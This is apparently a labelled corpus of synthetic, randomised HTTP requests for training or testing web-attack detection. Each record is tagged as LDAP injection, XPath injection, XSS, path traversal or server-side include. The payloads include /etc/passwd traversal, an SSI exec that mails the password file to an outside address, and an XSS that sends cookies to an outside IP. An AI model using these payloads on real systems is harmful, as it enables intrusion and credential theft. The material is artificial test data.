TE: chunked,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.9 (compatible; Konqueror/8.6; SunOS sun4u; cWlesc; qeCoun; h6d6)
UA-OS: Solaris
Via: aapRpu/1.3 www.47ryctr.gif, 6.5 www.s6rdalt.htm
Transfer-Encoding: ejfb
Upgrade: hiiEt/3.7
X-Serial-Number: 08336160636
----: ------------------------------

Etguru=641976656&p742tssavoe=vbscriptmgtpsed&ttaNgy03=qgo)$np<]em<l&sduseoreeuotEd=e7JKS&oyadifyiip=rtsge1urleyioZms&hsahg6=vwoa@h26omtp&tDneiertadenle9=o93hanansrxoA&q3RU2pEL_D-=9272&aldk3omYne8=gdrnwkttiocopEBeaT&23xs8a=417&coxmlncunt=1 fchild&ghepsnplykel=we eets[lht%processing-instructione

End - Id: 35912
Start - Id: 37237
class: LdapInjection
GET /gONj6VstyleThkhttpJGuservices.aspx?oosoreoaua=369490&l8Rehge=490376&kdh=hl&m3mees1qna7vA=8086455&kT-Z=%29+%28+%7C++%28+cn%3D*o++%27brien*+%29%28mail%3D*o++++%27brien*+++%29++++&uin3eh=293 HTTP/1.1
Host: 132.178.211.175
Connection: IisrUi
Accept: audio/*;q=0.4, audio/*
Accept-Charset: x-mac-chinesetrad;q=0.3, iso-8859-7;q=0.4, euc-kr, koi8;q=0.2
Accept-Encoding: deflate;q=0.6, identity;q=0.2
Accept-Language: Tooe-ss2nizss
Cache-Control: only-if-cached
Client-ip: 250.42.148.250
Cookie: LXWXusrImM=71088146;dfrtvriruTbegY=bHr;p;nhgooo=475371673;LUbKZQFdrOs=eancoWAcwe;npiG=zJkGZz3;b6Tqt7NeQv@r=teasnlihi
Cookie2: $Version="79"
Date: Sun, 04 Jun 06 01:44:31 GMT
ETag: "6rrN9a41Ue-7eg8e0W0"
Expect: nnsar
From: 87ho@Inuowxs.net
If-Modified-Since: Sat, 11 Oct 08 08:53:22 CET
If-Unmodified-Since: Tue, 21 Nov 06 04:11:53 CET
If-Match: "NL2X7@61VdelnlGgi"
If-None-Match: "l9XTDSH.PB4uRWT"
If-Range: Thu, 01 Jul 04 21:53:41 CET
Max-Forwards: 54
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM cm5pdG5lZG9pMGF0ZXRucnVsbmxtd3hlck9vc2hjZXRvSWplZXRvdA==
Range: 38889-,402727-278555
Referer: /phiqitrA.tiff
TE: deflate
Trailer: Via
User-Agent: Mozilla/5.2 (Windows; U; Windows NT 8.5; e1-ae; rv:5.0.8) Gecko/54799488
UA-CPU: PowerPC
UA-Disp: 836,441,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 322x932
Via: 9.4 8.82.230.223, HTTP/8.6 184.73.164.59, saehx/6.9 196.2.63.78
Transfer-Encoding: compress
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 543 62.152.4.78 "sexZEtEFnort" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37237
Start - Id: 35662
class: XPathInjection
GET /ace/1DEdocumentCmnDxtermQG/xk0jTvx3eS_YVJP1/rN9QZbqEPVW9826.jsp?ai=454&6ruNi4eiiU=e5objE%27++++or+++6++++%3C++++count%28path%2Fchild%3A%3A*%29+++or+++++%27tuE%27+%3D+%27 HTTP/1.0
Host: www.sfdY.de
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: cp-932, windows-1250;q=0.9
Accept-Encoding: identity, deflate
Accept-Language: hybdy-eHgmgdiw;q=0.3, uloait-OiO;q=0.0
Cache-Control: min-fresh=46
Client-ip: 109.120.70.170
Cookie: jewerdcKyy=u8 2aqf6Jy&=s
Cookie2: $Version="29"
Date: Fri, 02 Apr 10 05:11:50 GMT
ETag: "UDJxFP191jf5i2WY"
Expect: 100-continue
From: njsh@NrDrfrcud.com
If-Modified-Since: Fri, 07 Aug 09 13:29:05 CET
If-Unmodified-Since: Tue, 20 Nov 07 14:26:25 GMT
If-Match: "D7A_v3.3WyzcJu5ZdPIm"
If-None-Match: "aksz6pGr7ZDHKs.y5B"
If-Range: *
Max-Forwards: 814
MIME-Version: 3.1
Pragma: mdwpVr='6aadhsl'
Proxy-Authorization: lqioen sfhmyhu=mzEei
Authorization: Digest cnonce="nrsd"
Range: -5103
Referer: http://glhepl.net/f1oy.mpg
TE: chunked;q=0.4,chunked,trailers
Trailer: User-Agent
User-Agent: ehrnmds/8.7.3
UA-CPU: Sparc
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: HTTP/7.3 247.135.253.145, 8.0 102.62.189.6:4528, gtit/4.2 www.7uue.tiff:769
Transfer-Encoding: deflate
Upgrade: alcth4/9.0, omen/8.5
Warning: 673 36.123.188.80 "hcrIRotv8tetpAwee" 
X-Forwarded-For: 168.165.190.35
X-Serial-Number: 24734
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35662
Start - Id: 37062
class: LdapInjection
GET /ench/dH2KHEjP/i1saaifsTssqie/reern/iEbhe5pno3tpD/3cF_T/8bLXcQ8fsSdC@n.swf?EsgBnt=hrr&daitdc=509341180&childM6VGbetcZIAVm=gws3a&tnsF2nakbco=%29+++%28+++%7C++++%28++++cn%3D*o++++%27brien*++%29%28mail+%3D*o+%27brien*++%29+&dwvsnqx3=Doopenenreplacerosqore HTTP/1.1
Host: 20.127.146.128
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.3, euc-tw;q=0.3
Accept-Encoding: identity;q=0.6, gzip
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 229.87.115.154
Cookie: 7z3havingizsock_stream=a=optafRim[ ILs;rinrooiuprea=samhubsxoege;fgLRFy=09972324;rttaDDsta7lw=irTytjFr:r;5l0iis=@>;b=node;xp_Nsz=sNwonet22se6hsEtr
Cookie2: $Version="6"
Date: Tue, 10 Apr 07 18:05:47 CET
ETag: "3V52_A2tnUSoPxJz"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Sat, 16 Feb 08 05:55:14 UTC
If-Unmodified-Since: Tue, 31 Aug 04 12:17:46 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 497
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: pbvh geI1d=2fi3a
Authorization: Basic anRlcEVuOnN3dWVnMXBr
Range: 03242-,-0
Referer: /son5/tCxsw1/esit0rha.php4
TE: gzip;q=0.6
Trailer: Cache-Control
User-Agent: Mozilla/6.8 (compatible; oefeGE6bE; Win 9x; lOznp0g0; fieatrwteb)
UA-CPU: PowerPC
UA-Disp: 428,496,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: 6.2 35.120.178.131
Transfer-Encoding: gzip
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 0.114.107.58
X-Serial-Number: 595061014884085769
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37062
Start - Id: 47760
class: XSS
GET /Sopenjnull4SlocationR.css?1TA0=817&18iJh00aOimg=%3Cscript+%3Ealert+%28++++%22++++HsxeoTrtgO.l6lBh%22%29%3C%2Fscript%3E&tii=7755516143 HTTP/1.0
Host: www.fcm6t.cz
Connection: close
Accept: text/*;q=0.9, audio/*, video/*
Accept-Charset: x-mac-arabic;q=0.4
Accept-Encoding: *
Accept-Language: gteeolal-syih, ouEi-xtmra;q=0.4, ohorhi-si, me-Nlt;q=0.1
Cache-Control: no-cache
Client-ip: 87.178.32.94
Cookie: V@3WhpRNnodey5=os b0h6ae;qhc=tn;M9telnettelnet79Ex=a9u;dJe7g4om07np=6234651885
Cookie2: $Version="9"
Date: Fri, 30 Jul 04 07:35:34 CET
ETag: "V0Vh57R1gKYyWC."
Expect: d1Sn88md=cmr2icr;5hrwruT
From: ychumrg@eeAsehi.cz
If-Modified-Since: Tue, 05 Oct 04 20:59:43 CET
If-Unmodified-Since: Mon, 20 Oct 08 20:15:49 GMT
If-Match: "OqfaOdc4bJRDHS_xZ"
If-None-Match: "wdphDdHA.wquKS52KIy"
If-Range: Wed, 05 Apr 06 13:04:38 UTC
Max-Forwards: 68
MIME-Version: 7.7
Pragma: eath='ohntO'
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: aorh ish8=tofFt
Range: -41921,082-
Referer: /1Eswied/dhnZevom/inaseeot/Eyut/suas.js
TE: chunked,trailers
Trailer: Date
User-Agent: Mozilla/8.0 (compatible; MSIE 9.3; Win 9x; e0ueo9eto8; idtlash)
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: 7.1 www.imesH.png, HTTP/1.5 175.208.93.3
Transfer-Encoding: gzip
Upgrade: napl/9.6, u8eeko/2.8, unr/6.5, Cfe7/9.8
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 88.106.208.229
X-Serial-Number: 47690533150312984482
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47760
Start - Id: 48716
class: XPathInjection
GET /nt7cta.php4?enttshepadiAVe=8406++++or++++dla%2Fjut%2Fnt%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D9%5D+++or++23103%3D&dhgecEoa=tryitUv95.2&c5ypdtc4nr=62464&t1seeieTaetn9i=oSe%24MkoErtlnT7a&oiIn=hihwfnetcatt HTTP/1.1
Host: www.aai1.de
Connection: toeu
Accept: */*;q=0.4
Accept-Charset: x-mac-ce, iso-8859-9;q=0.4, iso-8859-15;q=0.4, iso-8859-2;q=0.7, iso-8859-8;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.4
Client-ip: 38.215.80.1
Cookie: gfrieegt17sT=)R1(s?liotdKe;bJtLOM=n7eimimem;ehittetl=tdIsdessms;uewsoi=O;hq8eedbitoej=eifptelnetoperl
Cookie2: $Version="7"
Date: Fri, 03 Jun 05 23:29:10 CET
Expect: 100-continue
If-Modified-Since: Wed, 24 Feb 10 05:17:23 CET
If-Unmodified-Since: Mon, 20 Oct 08 12:55:00 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
Proxy-Authorization: Basic d3huRXUyaTp0cWFtYw==
Authorization: avuot arbbtv=ggnnl
Range: 98467-277,778-,061140-824755
Referer: /3cye0oet.avi
User-Agent: Mozilla/4.0 (Windows; U; WinNT 0.4; e5-3m; rv:3.1.7) Gecko/35027722
UA-CPU: MIPS
Via: 8.4 www.pacmacwn.jpeg:36787
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48716
Start - Id: 45150
class: PathTransversal
GET ////? HTTP/1.1
Host: www.sdwTlE0od7.biz
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-4, iso-2022-kr, windows-1255;q=0.6
Accept-Encoding: identity;q=0.2, deflate, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 127.131.118.10
Cookie: atetat=gihqy;c7eitysslr5=55;thdrxeqietarz=95;reanlli5=7lq9:a;eeeaerh7uE=8l|a;QehtaccesciWqxY=sdrgciy
Cookie2: $Version="1"
Date: Thu, 07 Aug 08 05:46:19 UTC
ETag: "0wSFCQ37o04lOpEZWe"
Expect: sIseObpe
From: hdOf9re@eutwEh.uk
If-Modified-Since: Thu, 09 Mar 06 06:29:40 CET
If-Unmodified-Since: Wed, 30 Aug 06 11:54:22 UTC
If-Match: "OiyTKUiUAjqcX7sYx"
If-None-Match: "eW9hicL@KKPn5hP"
If-Range: "0gcNNxmEKdNOKPe"
Max-Forwards: 9680
Pragma: no-cache
Proxy-Authorization: Basic b2U1UnFvOnlOZWVyc2E=
Authorization: Digest uri=/depBmojv/i0anvi/ertltan/ssor/aleN.msf
Referer: /aoineset/ladezm/ttlOt3m.wav
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/4.9 (compatible; Konqueror/5.6; WinNT; oznt)
Via: FTP/8.0 www.lerno3ce.gif, FTP/1.7 102.160.223.174
Transfer-Encoding: identity
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
Warning: 845 www.yohtvu.htm:3657 "hi7s4a" 
X-Forwarded-For: 249.70.128.210
----: ----------------------------------

null

End - Id: 45150
Start - Id: 40591
class: SSI
GET /mGxOGEcJuxi55hrJs/dliorsolsa/oc9Ne5elnbniho/ytFL/Iusr7UqK8Prsock_streamnode6-TH/.9passthruZWw-At/ffaerta/siChec.swf?kire3ryndrbY=jeR6%3Cca+sa&sxe1Eueeigar=ihretran0ti&oWrttuwrar3gy=6rd6h+a&rfgs=%2Fo&jXjfstdinD=%3C%21--+++%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E&w5Z6xc7tsE=saileEfaoam&nnnae=6&ezhgst5heet=%3Apw&XEmY=daoiliRR0nh&nfcn9Ohg=ee0 HTTP/1.1
Host: www.etniu.biz:7313
Connection: keep-alive
Accept: application/*, image/*;q=0.2
Accept-Charset: x-mac-cyrillic;q=0.0, iso-8859-5
Accept-Encoding: *
Accept-Language: ee3hee-Ee2;q=0.2, ynaOye-Sl4rrta;q=0.4, fuV-p;q=0.4
Cache-Control: tga566n='tNosNi'
Client-ip: 125.254.16.61
Cookie: 8a1ores=259336813;aeUe=280;h4ifces=oihtaccesh;mgttenwN=08;ylshagdm=zbncawonastt;mtmtmi=72
Cookie2: $Version="3"
Date: Fri, 28 Dec 07 13:20:34 CET
ETag: W/"bb110ijb0AjJQj0"
Expect: 100-continue
From: tiotlhOg@Ee0em4sr8.gov
If-Modified-Since: Sun, 30 Mar 08 22:07:43 GMT
If-Unmodified-Since: Thu, 17 Mar 05 20:45:32 UTC
If-Match: *
If-None-Match: *
If-Range: "kqisXVMKs4pOTWl_"
Max-Forwards: 3672
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM YWhlYXFlbmhuY2U4aHlhdGxOZWk1ZGVtdG91QTVsMXJycWVtZWRmZTFoNG9sTnI=
Authorization: Digest algorithm=MD5-sess
Range: -4
Referer: /daeoas/wen4o/brtaoo/tdhn.js
TE: trailers,deflate,trailers
Trailer: Warning
User-Agent: Mozilla/8.9 (Machintosh; U; PPC Mac OS X 2.6; io-sc; rv:5.4.8) Gecko/74395164
UA-CPU: StrongARM
UA-Disp: 2015,473,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 972x7445
Via: FTP/4.0 56.194.5.206:53, HTTP/3.5 www.Dvrdhcs.shtml
Transfer-Encoding: compress
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 737 www.suaxgW.shtml "9arerm" 
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 69115
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40591
Start - Id: 39560
class: SSI
POST /tCao8Ic4reGVup8N.png? HTTP/1.0
Content-Length: 353
Content-Language: enloekl,a,Aietw
Content-Encoding: gzip
Content-Location: /ato7yr/anmd/spegpmia/gsstsoel/rah6rn.php3
Content-MD5: c2FzbGllaG9kdHVoZWhydA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Jun 09 03:19:35 GMT
Last-Modified: Mon, 21 Aug 06 23:10:18 UTC
Host: www.icDHo.it
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.8, ks_c_5601-1987;q=0.0, utf-7;q=0.3, ks_c_5601-1987, x-mac-roman
Accept-Encoding: gzip;q=0.6
Accept-Language: *
Cache-Control: max-age=902
Client-ip: 147.32.196.230
Cookie: diaiicCooboa=1HlT9P;ld=sN.;outr7rAa=9NstrLnn;ftt8ietaitOn=60;Ooos8=7Btmntreao;ec=CiEgerwithi
Cookie2: $Version="99"
Date: Sat, 18 Jul 09 16:03:43 GMT
ETag: ".ZpMfbiUz3x2gzQ"
Expect: nmfso8Ea
From: zdt1Ooe@cVtsgan.ch
If-Modified-Since: Fri, 04 Dec 09 12:58:15 CET
If-Unmodified-Since: Sun, 06 Sep 09 14:46:39 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Jan 08 09:59:13 GMT
Max-Forwards: 971
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZjJzNWlueDhhY29hdHBvZ2VvZWZwcmlyb2ljdDdidm55YXR5eTJpRWV4YWpTZXA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 80266-6,060-21789
Referer: /treaesss/7dIl/2vhdeb.dll
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Referer
User-Agent: Mozilla/4.7 (X11; U; Open BSD i586 3.3; rc-rt; rv:2.9.1) Gecko/80996140
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color8
Via: ttbAa/3.4 www.feb5.gif:15029
Transfer-Encoding: gzip
Upgrade: nqe/4.6, tcf/9.3, s1a3ie/5.1, pcoE/9.0, Ier1/7.4
Warning: 138 www.mUgeeihd.jpeg "rr0mHnay7tiSwEpan" "Thu, 22 Mar 07 10:16:04 GMT"
X-Serial-Number: 11507528452920010282
----: --------------------------------------
~~~~~: ~~~~~~~~~~

rLnyjnseSyIhsb=8uvNGT2mCvn&8salibrx=eftlOsgp| $ggbwi&pe9ehaelannntgw=tr4s&ssge9=<!--#include    virtual="/etc/passwd"   -->&tu7Dodanteseed=likegtesr'9F&ya1apopey2n=;ally%e&yxPHexecSUvm1d=hsnph&scriptzcQ=u&ltcaGe2owc9tba=elts=e3ht&tltenh6dyerre=r1neetitaabha&hr9iyw=f:+bwoc&4 hlec&XI@T@NMh=olautoexecs&ft7oe=iBMdOKhOcS

End - Id: 39560
Start - Id: 44672
class: PathTransversal
GET /lpta/fyKu29itO9H67TZ/d-Rzxuhtpasshttpsvarn87A-/etht9eotblelos/ig/bUxDNY45J04wVYe.htm? HTTP/1.1
Host: 106.147.181.248
Connection: ntmwawaw
Accept: image/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-stale=060
Client-ip: 31.19.148.253
Cookie: benpelfrn0Oe=file:///D:/Siam/80s/susaLA4A.xml;mts0i=lIgk8styceiaetr;dsi=217260;lanatbd=iGGkZZXv9Ol5
Cookie2: $Version="3"
Date: Tue, 11 Nov 08 10:07:29 UTC
ETag: W/"ZPtdydKjD0o8GzDZSp"
Expect: hjir=edwNge;asd0sezv
From: lijela@gEi2.it
If-Modified-Since: Sun, 10 Oct 04 24:01:42 GMT
If-Unmodified-Since: Fri, 03 Jul 09 05:07:04 UTC
If-Match: *
If-None-Match: "_vbz3w0u-niWEIH"
If-Range: *
Max-Forwards: 0
MIME-Version: 7.1
Pragma: errnhtos='t4t'
Proxy-Authorization: etOx mtcLY=aeczc
Authorization: NTLM YUhpdGNydGlmeW1yZTJlc3N0V3R2MHJvMnJuY2xqbFltcERpc2NldXhvZTBlcg==
Range: -9,446-879,-43250
Referer: /Eisge6ur/8susnem/qkah/teQo/tlae82.jpg
TE: trailers,trailers,chunked
User-Agent: Mozilla/1.3 (Windows; U; Win98 2.8; 1l-bt; rv:9.5.2) Gecko/99342205
UA-CPU: x86
UA-Disp: 2213,7553,16
UA-OS: WinNT
UA-Pixels: 0638x7767
Via: 9.8 www.qiyU.gif, FTP/1.5 134.144.103.89
Transfer-Encoding: identity
Upgrade: rmiro/7.0, h6e/3.6, rmetSb/1.0, hit/5.5, ire/4.8
Warning: 261 www.mgg4aoca.png "no9sises0ren2" 
X-Forwarded-For: 34.52.64.101
X-Serial-Number: 8768196
----: ----------------------------------------

null

End - Id: 44672
Start - Id: 40067
class: SSI
GET /aeuu6Ao/fw4AslNe00H/coTwnhpNuonvo9i6ino/aEB-ZyUqZsU3B0W/metaEg/Asenatep9ous/jEEf./Iiae2Kocuyanv/oOPMscriptwrSAY@1systemG/r4-/4jiGClat3siitrti/giT1tzuteeDdyneh1o.exe?aaaotc6uc30w=puAeaoy3svgDu&aNsie=378651&iwabivl=5790&gk=s7y&JshutdownX2jobjectCmh=59&cle8taa=ieeinputsn%3BecT%3C%26&gsoainztRgelou=xQB1&gau=anlni&htOaenquwue9us=ah%40Hwmr&passthruhaving3having=ys1lMag&fnasw9rah=68C_v&shtsjcdair=egrcos6Eesnq&T7jf60J5ah=Yptxetedeleteweeemd&iuleiueei=%3C%21--+++%23exec++++cmd%3D%22%2Fbin%2Fmail+++++ifSbmHlemc.com+++++%3C+%2Fetc%2Fpasswd%22--%3E&zkJebn=0ga HTTP/1.1
Host: 81.40.97.75:80
Connection: eiNis
Accept: video/quicktime;q=0.4, audio/*, application/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: pBtmg-aE5r
Cache-Control: no-cache
Client-ip: 159.72.147.40
Cookie: 0woooaatga=ntNemtAkti)re]htaccesulin;naqeOmh1ghs=ik?hlocationc:insertnctnEtaad$$
Cookie2: $Version="530"
Date: Fri, 15 Apr 05 20:27:48 GMT
ETag: W/"m822BdROxDnURNjxK_V."
Expect: 100-continue
From: uohepreO@9Mntu.biz
If-Modified-Since: Sun, 03 Oct 04 01:05:25 CET
If-Unmodified-Since: Sun, 24 Jun 07 04:07:34 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Sep 04 16:59:36 UTC
Max-Forwards: 775
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: 4allo mtnma=nrn0a
Authorization: Digest uri=http://www.atrBt.uk/llTg/lmty/srosiRhd/mteu/4rRzRrnd.swf
Range: -34,965-6
Referer: http://etpehse.uk/EboiwptM/ma4wg3ni/HPrasoF.mdb
TE: gzip;q=0.4,trailers,deflate;q=0.0
Trailer: Via
User-Agent: Tacxdrlgfenu2ehutc
UA-CPU: PowerPC
UA-Disp: 665,2462,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 893x680
Via: 3.8 40.37.223.23, fenf/3.4 www.v9eom.htm, 0.6 67.70.172.248
Transfer-Encoding: deflate
Upgrade: ToKh/4.1, goe/9.9, moax/0.8
Warning: 911 www.ejut.htm:36 "cae6hwoklthpbe8t9y" "Wed, 10 Feb 10 10:50:49 GMT"
X-Forwarded-For: 149.177.156.143
X-Serial-Number: 827844806951903095
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40067
Start - Id: 45853
class: PathTransversal
GET /nR/ASj9irm/sYeuj8pXLiAp_FEVt/jNuusiptovobg/suLntr0n8pjvojlEttx/hIP_SiWbodyW0.png?ttreD8oon=tn1ouchdNcaflt&abVtr=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&klbapn=tmpofo+&sagz=env1qVhrAnh9ioUnc&oMSiwt=6&m1yAd=euerha&lgtGexNmm=evVRKf&Ljteettoehnqa=ofp&dai8o=e0P&meesDcjhotjeogm=rls&MDVcZx1u=eo7tG&HrkrkB9=oDeheht%7Ceacheit&ss=pAJXjSTdyjDs HTTP/1.1
Host: 116.112.67.100
Connection: nmype
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, identity, deflate, compress
Accept-Language: *;q=0.0
Cache-Control: min-fresh=4
Client-ip: 33.52.184.12
Cookie: esebnpnoo1=0985172;e9EoioeC=aYBbaLl0;dc0ten2son9omp=3453358;n3eczjeEmadiefI=fus;danhmbc5lN9Opv=070339
Cookie2: $Version="19"
Date: Tue, 14 Oct 08 05:42:21 GMT
ETag: W/"yEEW3T@Wp7SFTD9Qt"
Expect: eyt2oeR=eRejn7aa
From: nty1riog@emdl05l.uk
If-Modified-Since: Fri, 03 Apr 09 01:17:15 CET
If-Unmodified-Since: Wed, 14 Mar 07 03:22:03 GMT
If-Match: "x3sUwmE7bx0ZAzGT4e2e"
If-None-Match: *
If-Range: "HQHG3Sit@CtUCU1S5lhh"
Max-Forwards: 1580
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Basic dGVyYWFkOnlSaW9z
Range: 505894-77
Referer: /lmozvuse/tiuzjo/r0lcmna/scsa/nsqf.mdb
TE: trailers,deflate,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 4.0; t4-te; rv:4.5.5) Gecko/25961862
UA-CPU: Sparc
UA-Disp: 011,2094,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8255x255
Via: 2.5 110.254.59.88, 0.8 240.191.168.249, mea/5.6 239.102.105.100
Transfer-Encoding: Eecu; snnbhcla=aoOe4
Upgrade: oaae/2.2
Warning: 787 245.252.99.223 "dmrosab" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45853
Start - Id: 46130
class: PathTransversal
GET /eoremhiearhiconenst/ayuBFE/iBtHOLR4q_h-fH2aCJh/Dooozid.jpeg?iEaohtsie7ktv3=37384&frreeie=nVa%280xmlndi%5Dgftpw%28t&rttNtdo0N=lFdDxBqcc&otetohP=iVA76gN6Z&ettwnmcmLaaTue=Y%3Csehn+skwd&wtibmewmgime=141&VkM3F7r=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd HTTP/1.0
Host: 137.114.77.91
Connection: close
Accept: image/*, audio/basic;q=0.7, image/*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=2
Client-ip: 17.48.51.41
Cookie2: $Version="272"
Date: Thu, 16 Jul 09 14:28:18 GMT
ETag: W/"vMDloPJ7nBvdxA8cggU"
Expect: 100-continue
From: r9hecgen@ob8h.it
If-Modified-Since: Tue, 26 Jul 05 13:48:37 UTC
If-Unmodified-Since: Mon, 29 May 06 18:17:02 CET
If-Match: "Mu1lvE5KhN60G@7gsc_J"
If-Range: Mon, 27 Sep 04 10:27:45 UTC
Max-Forwards: 5
Pragma: byd=bdsaos
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest uri=http://ykBG.com/r1nea/kaea/2Shql5/iizia.tiff
Referer: /xelwnu/pnpeah.asp
TE: deflate;q=0.9,gzip;q=0.3
User-Agent: Mozilla/5.3 (Machintosh; U; PPC Mac OS X 4.8; co-de; rv:4.1.2) Gecko/10729466
Transfer-Encoding: deflate
Upgrade: pwj/2.5, tejm/1.1
X-Serial-Number: 83931
----: ----------

null

End - Id: 46130
Start - Id: 47819
class: XSS
GET /ippxXQR2l/dj1N@WQ/3i/nS6FosoexmbO-co/ulgeatenatioyrnle/o15@CwZJEne1X/wqOv8RngOMFI.2Q/phbmcaerz/dF2Cw-qOZFZ@/4@WYbPinsertVuincludeXshutdownf/gaitt6VasCacao8Ci/ieSy4fdkt0ao.htm?zCncpechobk.uO7h=%3Ch3ap%28inhavingrgra&1n5p=%3Cimg+src+++%3D+++%22+++++li++++%22onmouseover%3D%22++%5Bwindow.open%28%27http%3A%2F%2F251.143.125.228%2Fin.php4%27%2Bdocument.cookie%29%3B%5D++%22+%3E&0gsr=sae0UhS&sey=oat5ijrdE2l%24r+%5Deaoh&kGaccess_log@wW=+lodqawoheaeAgagdivp&oiec=0&m.qFzLGnWu=2&relQec4r=3 HTTP/1.1
Host: www.tdasi2az.it
Connection: close
Accept: application/*, video/mpeg
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.6, compress, deflate;q=0.7, deflate, identity
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 203.124.10.83
Cookie: jlnHmg=nescma1zrolinkue;L-1RLzMO@Y=>mo;HU0RXG@=twaeNwslhfoe
Cookie2: $Version="370"
Date: Sun, 15 Feb 09 15:13:09 GMT
ETag: W/"OurwtpibD7A0noXC"
Expect: 100-continue
From: aelcese@ohx6uolgc.ch
If-Modified-Since: Mon, 20 Sep 04 19:28:13 UTC
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: "vL@n2bM6DSX3K1T"
If-None-Match: "HJvHbk2nRpGxH96nPX"
If-Range: "xax1uOCs1QxCd3aBSqM"
Max-Forwards: 629
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest uri=/g5nxxi/tLEiado/9dOtoth5/deavlru/bosadp.aspx
Authorization: Digest username="3moa"
Range: 2820-37,-5180,81-
Referer: /sfean/tltr/NIyorc/fEotadfd.ace
TE: gzip;q=0.1
Trailer: TE
User-Agent: ldFprmruf (ikCt6Pw; xEjWzM8qW)
UA-CPU: x86
UA-Disp: 9028,3177,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 907x206
Via: 3.6 www.keAeda.tiff
Transfer-Encoding: identity
Upgrade: ag4wjm/5.9, sei6/6.5, sa3/7.1, 2sodF/1.7
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 7313347
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47819
Start - Id: 36116
class: PathTransversal
